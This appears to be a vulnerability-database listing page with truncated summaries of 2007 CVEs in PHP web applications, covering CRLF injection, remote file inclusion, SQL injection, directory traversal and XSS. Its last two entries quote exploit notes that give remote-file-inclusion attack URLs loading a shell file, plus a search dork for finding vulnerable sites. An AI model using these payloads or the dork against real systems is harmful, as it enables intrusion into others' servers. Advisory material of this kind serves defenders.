CRLF injection
CRLF injection vulnerability in index.php in Drake CMS 0.4.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the lang parameter. NOTE: Drake CMS has only a beta version available, and the vendor has previously stated "We d...
CVE-2007-2618
The CVE-2007-2618 issue affects Drake CMS 0.4.0, identifying a CRLF injection vulnerability in index.php. The root cause is a CRLF sequence in the lang parameter that enables an attacker to inject arbitrary HTTP headers and perform HTTP response splitting. Public details describe the vulnerable c...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the (a) ETCDIR parameter to (1) libs/lom.php; (2) lom_update.php, (3) check-lom.php, and (4) weigh_keywords.php in scripts/; the (b) LIBSDIR parameter to (5) logout.php, (6) help.php...
CVE-2007-2609
CVE-2007-2609 affects gnuedu 1.3b2 with multiple PHP remote file inclusion vulnerabilities. An attacker can trigger arbitrary PHP code execution by supplying untrusted values to the ETCDIR parameter for files/libs (libs/lom.php; lom_update.php; check-lom.php; weigh_keywords.php; web/lom.php) and...
SQL injection
SQL injection vulnerability in index.php in the wfquotes 1.0 0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action...
CVE-2007-2574
The CVE-2007-2574 entry describes a directory traversal vulnerability in Archangel Weblog 0.90.02, where an attacker can read arbitrary files by supplying a .. (dot dot) path in the index parameter of index.php. This is caused by improper validation of the index parameter, enabling access to file...
CVE-2007-2562
Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the _m parameter...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in phpFullAnnu CMS (pfa CMS) 6.0 allows remote attackers to execute arbitrary PHP code via a URL in the repinc parameter. NOTE: CVE disputes this issue since $repinc is set to a constant value before use...
CVE-2007-2562
Vulnerability summary (CVE-2007-2562): Kayako eSupport 3.00.90 is affected by a cross-site scripting (XSS) flaw in index.php, exploitable via the _m parameter. The underlying issue is unsanitized input passed through this parameter, allowing remote attackers to inject arbitrary web script or HTM...
CVE-2007-2558
CVE-2007-2558 concerns a PHP remote file inclusion in the web app pfa CMS (phpFullAnnu CMS) version 6.0, specifically in index.php via the repinc parameter. The vulnerability is described as enabling remote PHP code execution through a URL if repinc is used to include code. However, the CVE notes...
Directory traversal
Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. (dot dot) in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...
CVE-2007-0609
Directory traversal vulnerability in Advanced Guestbook 2.4.2 allows remote attackers to bypass .htaccess settings, and execute arbitrary PHP local files or read arbitrary local templates, via a .. (dot dot) in a lang cookie, followed by a filename without its .php extension, as demonstrated via a...
CVE-2007-2548
Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and a remote attack vector, related to "Cookie Manipulation."...
CVE-2007-2548
Summary: CVE-2007-2548 concerns TurnkeyWebTools SunShop Shopping Cart 4.0 with an issue in index.php described as a vulnerability tied to cookie manipulation and a remote attack vector. The exact impact is listed as unknown in the description. The available data indicate a remote, low-complexity...
CVE-2007-2549
CVE-2007-2549 affects TurnKeyWebTools SunShop Shopping Cart 4.0. SQL injection in index.php via the (1) c or (2) quantity parameter allows remote attackers to execute arbitrary SQL commands. Root cause is unsanitized input in index.php that enables SQL commands to reach the database. The connecte...
CVE-2007-2527
The CVE affects DynamicPAD prior to version 1.03.31. It exposes multiple PHP remote file inclusion vulnerabilities that allow an attacker to execute arbitrary PHP code by supplying a crafted URL in the HomeDir parameter to either dp_logs.php or index.php. The underlying issue is a remote file inc...
DynamicPAD <= 1.02.18 (HomeDir) Remote File Inclusion Vulnerabilities
No description provided by source. DynamicPAD Remote file inclusion HomeDir Download script : http://dynamicpad.org/dp.tar.gz Thanks Str0ke Dork : "Powered By DynamicPAD" Exploit : http://victim.com/dppath/dplogs.php?HomeDir=shell.txt? http://victom.com/dppath/index.php?HomeDir= shell.txt?...
pfacms-rfi.txt
pfa CMS v6.0 // AYYILDIZ.ORG Proudly Presents ! = OZELHAREKAT Author: iLker Kandemir ScriptSite: http://pfa.netsliver.com/downloadpfa Tnx: H0tturk,Ekin0x,Dumenci,Gencnesil,Gencturk,Str0ke Exploit: http://site/pfapath/index.php?repinc=http://shell.txt?...